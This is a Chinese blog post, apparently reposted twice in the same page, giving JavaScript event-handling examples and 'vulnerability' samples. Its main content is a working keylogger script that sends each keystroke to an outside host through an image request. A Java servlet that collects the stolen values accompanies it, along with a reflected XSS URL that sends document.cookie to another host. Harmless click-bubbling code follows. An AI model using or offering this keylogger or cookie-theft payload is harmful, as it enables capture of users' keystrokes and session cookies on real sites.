js页面事件响应及js破绽示例
日期:2014-05-16 浏览次数:20375 次
js页面事件响应及js漏洞示例
js:
<script>
function keylogger (e) {
document.images[0].src="http://www.ckfinancing.com/study/cookie?cookie="+e.keyCode;
}
document.body.attachEvent("onkeydown", keylogger);
</script>
servlet:
http://www.ckfinancing.com/study/cookie?cookie=
public void doPost(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
response.setContentType("text/html;charset=UTF-8");
String cookie = request.getParameter("cookie");
System.out.println(cookie);
}
<==========================================================================>
http://a.com/search?keyword=<script>document.images[0].src="http://b.com/xxxx?cookie="+unescape
(document.cookie);</script>
servlet参考上面例子
<==========================================================================>
js页面键盘事件响应
<script type="text/javascript">
//FF,Chrome
if(window.addEventListener){
document.addEventListener('click',function(e){alert('document');},false);
document.body.addEventListener('click',function(e){alert('document.body');e.cancelBubble=true;},true);
}
//IE
else if(window.attachEvent){
document.attachEvent('onclick', function(e){alert('document');});
document.body.attachEvent('onclick', function(e){alert('document.body');e=e||
window.event;e.cancelBubble=true;});
}
</script>
js:
<script>
function keylogger (e) {
document.images[0].src="http://www.ckfinancing.com/study/cookie?cookie="+e.keyCode;
}
document.body.attachEvent("onkeydown", keylogger);
</script>
servlet:
http://www.ckfinancing.com/study/cookie?cookie=
public void doPost(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException {
response.setContentType("text/html;charset=UTF-8");
String cookie = request.getParameter("cookie");
System.out.println(cookie);
}
<==========================================================================>
http://a.com/search?keyword=<script>document.images[0].src="http://b.com/xxxx?cookie="+unescape
(document.cookie);</script>
servlet参考上面例子
<==========================================================================>
js页面键盘事件响应
<script type="text/javascript">
//FF,Chrome
if(window.addEventListener){
document.addEventListener('click',function(e){alert('document');},false);
document.body.addEventListener('click',function(e){alert('document.body');e.cancelBubble=true;},true);
}
//IE
else if(window.attachEvent){
document.attachEvent('onclick', function(e){alert('document');});
document.body.attachEvent('onclick', function(e){alert('document.body');e=e||
window.event;e.cancelBubble=true;});
}
</script>
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
